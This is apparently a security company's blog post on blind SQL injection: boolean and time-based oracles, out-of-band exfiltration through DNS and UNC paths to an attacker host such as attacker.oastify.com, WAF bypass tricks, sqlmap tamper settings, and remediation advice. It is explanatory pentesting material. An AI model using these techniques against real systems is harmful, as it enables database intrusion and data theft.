BIPI
BIPI

Blind SQL Injection Techniques: Time-Based, Boolean, and Out-of-Band Exfiltration

Cybersecurity

Practical blind SQLi tradecraft for 2024: boolean oracles, time delays that survive jittery networks, and DNS exfiltration when nothing else echoes.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 15, 2024 · 11 min read

#sql-injection#pentesting#sqlmap#database-security

When the application swallows errors and returns identical responses for true and false, classic in-band SQLi falls apart. Blind injection is where the craft lives: building a reliable oracle, then exfiltrating bytes one at a time through inference or out-of-band channels.

Spotting Blind Injection Points

  • Login forms returning generic invalid credentials regardless of input shape
  • Search endpoints with consistent 200 OK but subtle latency variance
  • JSON APIs that hide stack traces behind a generic 500
  • ORDER BY parameters where numeric values quietly accept expressions
  • Headers like User-Agent and Referer logged into SQL without parameterization

Boolean-Based Oracles

Build a stable diff. Send a payload like 1 AND 1=1 and 1 AND 1=2, then compare response length, status, and a hash of the normalized body. Once you have a binary oracle, extract data with substring and ASCII comparisons one character at a time.

Time-Based Techniques

When responses are identical, lean on the clock. MySQL SLEEP, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY, and Oracle DBMS_PIPE.RECEIVE_MESSAGE all work. Account for jitter by running each probe three times and using the median.

Out-of-Band Exfiltration

  1. MSSQL xp_dirtree pointed at a Burp Collaborator UNC host
  2. Oracle UTL_HTTP.REQUEST with attacker URL embedding the secret as a subdomain
  3. MySQL LOAD_FILE on Windows pointing to a UNC path you control
  4. PostgreSQL COPY TO PROGRAM where superuser is available
  5. DNS exfiltration by concatenating the secret into a subdomain of attacker.oastify.com

WAF Bypass Tricks

  • Comment injection: SEL/**/ECT and MySQL versioned comments
  • Case mixing and whitespace alternatives like tab, newline, form feed
  • Encoding the payload as JSON in a parameter the WAF does not parse
  • HTTP parameter pollution where the WAF reads one and the app concatenates both
  • Unicode lookalikes for keywords on stacked queries

Tooling: sqlmap and Beyond

sqlmap is excellent at automating boolean and time-based extraction. Use technique BT with time-sec 8 and a tamper script chain like between, space2comment, charunicodeencode. For OOB, pair with Burp Collaborator or interact.sh.

Manual injection teaches the database. Automation only speeds up what you already understand.

Second-Order Injection

The payload is stored on registration and triggers on a later admin query. Audit profile updates, support tickets, and audit log viewers. The detection oracle lives in a different request than the injection point, so tooling often misses it.

Remediation That Actually Holds

  1. Parameterized queries everywhere, including ORDER BY via allowlists
  2. Least privilege DB accounts: no FILE, no xp_cmdshell, no superuser
  3. Egress filtering on the DB host blocks DNS and HTTP exfiltration
  4. Query timeouts cap time-based exploitation
  5. WAF as defense in depth, never as the primary control
8s
recommended SLEEP duration over WAN
3x
probes per bit for reliable inference
CVE-2024-3400
PAN-OS OOB SQLi style chain to study

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.